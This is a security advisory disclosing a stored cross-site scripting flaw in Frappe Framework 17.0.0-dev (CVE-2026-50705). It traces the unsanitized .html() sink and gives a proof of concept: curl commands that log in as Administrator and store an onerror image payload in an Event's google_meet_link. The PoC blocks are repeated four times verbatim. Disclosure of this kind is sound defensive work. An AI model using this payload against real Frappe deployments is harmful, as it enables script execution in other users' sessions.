Solución

Planes

Recursos

Advisories

Compañía

Select Language



Contactar a ventas

Iniciar sesión

Prueba gratis

Select Language



Contactar a ventas

Prueba gratis

Select Language





Advisories

Frappe Framework 17.0.0-dev - Stored XSS in Form Dashboard headline rendering

4,6

Medium

Detected by

Fluid Attacks AI SAST Scanner

Disclosed by

Oscar Uribe

Summary

Full name

Frappe Framework 17.0.0-dev - Stored XSS in Form Dashboard headline rendering

Code name

aterciopelados

State

Public

Release date

24 jun 2026

Affected product

Frappe Framework

Vendor

Frappe

Affected version(s)

17.0.0-dev

Vulnerability name

Stored cross-site scripting (XSS)

Vulnerability type

010. Stored cross-site scripting (XSS)

Remotely exploitable

Yes

CVSS v4.0 vector string

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

CVSS v4.0 base score

4.6

Exploit available

Yes

CVE ID(s)

CVE-2026-50705

Description

A Cross-Site Scripting (XSS) vulnerability exists in Frappe Framework version 17.0.0-dev due to improper neutralization of untrusted input in the Form Dashboard headline renderer. The headline rendering pipeline accepts HTML strings and inserts them into Desk forms using jQuery's .html() method without sanitization.

An attacker who can influence values incorporated into headline messages may inject arbitrary HTML or JavaScript that is executed when the affected form is viewed. This issue is exploitable when form scripts interpolate attacker-controlled or externally sourced data into dashboard headlines.

Vulnerability

Case A: `Event.google_meet_link` to headline HTML sink

Source: google_meet_link is populated from Google Calendar hangoutLink during sync:
- insert path: "google_meet_link": event.get("hangoutLink")
- update path: calendar_event.google_meet_link = event.get("hangoutLink")
Client interpolation: Event form refresh builds HTML with direct interpolation into an anchor attribute:
- `<a target='_blank' href='${frm.doc.google_meet_link}'>Google Meet</a>`
Headline dispatch chain:
- frm.dashboard.set_headline(...) -> frm.set_headline(...) -> frm.layout.show_message(...)
Sink behavior:
- frappe.utils.is_html(html) checks only for presence of HTML elements.
- If true, show_message uses .html(html) (unsanitized insertion).
Impact: malicious payload stored in google_meet_link can execute when a victim opens/reloads the Event form.

Case B: helper path forcing HTML branch

set_headline_alert(text, ...) wraps input as <div>${text}</div>.
This guarantees is_html(...) === true and routes content into .html(...) branch.
Any script that passes untrusted/echoed text into set_headline_alert reaches the same sink.

Relevant code:

frappe/frappe/desk/doctype/event/event.js:54-57
frappe/frappe/public/js/frappe/form/dashboard.js:648-650
frappe/frappe/public/js/frappe/form/form.js:1519-1530
frappe/frappe/public/js/frappe/form/layout.js:106-121
frappe/frappe/public/js/frappe/utils/utils.js:158-167
frappe/frappe/integrations/doctype/google_calendar/google_calendar.py:392
frappe/frappe/integrations/doctype/google_calendar/google_calendar.py:433
frappe/frappe/integrations/doctype/google_calendar/google_calendar.py:490
frappe/frappe/core/doctype/data_import/data_import.js:174 (additional headline call site pattern)

PoC

Reproduction used in validation environment

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

Create an Event with a crafted google_meet_link payload and future ends_on:

EVENT_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={
    "doctype":"Event",
    "subject":"Dashboard Headline XSS PoC 1",
    "event_type":"Public",
    "starts_on":"2026-03-11 09:00:00",
    "ends_on":"2026-12-31 09:30:00",
    "google_meet_link":"https://meet.google.com/demo'\''><img src=x onerror=alert(9771)>"
  }' | jq -r '.message.name')

echo "$EVENT_NAME"

EVENT_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={
    "doctype":"Event",
    "subject":"Dashboard Headline XSS PoC 1",
    "event_type":"Public",
    "starts_on":"2026-03-11 09:00:00",
    "ends_on":"2026-12-31 09:30:00",
    "google_meet_link":"https://meet.google.com/demo'\''><img src=x onerror=alert(9771)>"
  }' | jq -r '.message.name')

echo "$EVENT_NAME"

EVENT_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={
    "doctype":"Event",
    "subject":"Dashboard Headline XSS PoC 1",
    "event_type":"Public",
    "starts_on":"2026-03-11 09:00:00",
    "ends_on":"2026-12-31 09:30:00",
    "google_meet_link":"https://meet.google.com/demo'\''><img src=x onerror=alert(9771)>"
  }' | jq -r '.message.name')

echo "$EVENT_NAME"

EVENT_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={
    "doctype":"Event",
    "subject":"Dashboard Headline XSS PoC 1",
    "event_type":"Public",
    "starts_on":"2026-03-11 09:00:00",
    "ends_on":"2026-12-31 09:30:00",
    "google_meet_link":"https://meet.google.com/demo'\''><img src=x onerror=alert(9771)>"
  }' | jq -r '.message.name')

echo "$EVENT_NAME"

Open the created Event form:

echo "http://localhost:18080/desk/event/${EVENT_NAME}"

echo "http://localhost:18080/desk/event/${EVENT_NAME}"

echo "http://localhost:18080/desk/event/${EVENT_NAME}"

echo "http://localhost:18080/desk/event/${EVENT_NAME}"

Expected result:

The dashboard headline renders and executes alert(9771) when the malicious HTML is parsed.

Evidence of Exploitation

Video of exploitation:

Our security policy

We have reserved the ID CVE-2026-50705 to refer to this issue from now on.

System Information

Frappe Framework
Version 17.0.0-dev
Operating System: Any

References

Github Repository: https://github.com/frappe/frappe
Security: https://github.com/frappe/frappe/security

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Oscar Uribe from Fluid Attacks' Offensive Team using the AI SAST Scanner.

Timeline



4 jun 2026

Vulnerability discovered



5 jun 2026

Vendor contacted



7 jun 2026

Vendor replied



24 jun 2026

Public disclosure

Does your application use this vulnerable software?

During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Start free trial

Las soluciones de Fluid Attacks permiten a las organizaciones identificar, priorizar y remediar vulnerabilidades en su software a lo largo del SDLC. Con el apoyo de la IA, herramientas automatizadas y pentesters, Fluid Attacks acelera la mitigación de la exposición al riesgo de las empresas y fortalece su postura de ciberseguridad.

Lee un resumen de Fluid Attacks